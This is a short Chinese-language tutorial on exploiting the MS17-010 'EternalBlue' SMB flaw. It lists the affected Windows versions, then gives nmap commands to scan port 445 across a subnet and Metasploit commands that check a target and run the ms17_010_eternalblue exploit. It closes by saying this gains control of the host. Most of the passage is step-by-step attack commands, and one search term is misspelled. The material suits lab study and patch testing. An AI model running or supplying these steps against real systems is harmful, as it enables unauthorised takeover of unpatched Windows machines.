影响范围
目前已知受影响的Windows 版本包括但不限于:
WindowsNT,
Windows2000、
Windows XP、
Windows 2003、
Windows Vista、
Windows 7、
Windows 8,
Windows 2008、
Windows 2008 R2、
Windows Server 2012 SP0
漏洞探测
- nmap初步探测
nmap -p 445 -sS 192.168.100.0/24
#探测445端口是否开放,若开放继续探测
- msfconsole探测
msfconsole
#打开msf框架
search msf17_010
#查询和该漏洞有关的扫描器和利用脚本
#使用带有scaner和msf17_010的辅助扫描器
set RHOSTS 192.168.100.10
run
#查看返回的是否有漏洞
show missing
#查看配置中,必须配置,但没有配置的项
漏洞利用
- msfconsole利用
search ms17_010
#搜索永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalblue
#选择 exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.100.10
run
#运行后就得到主机的权限了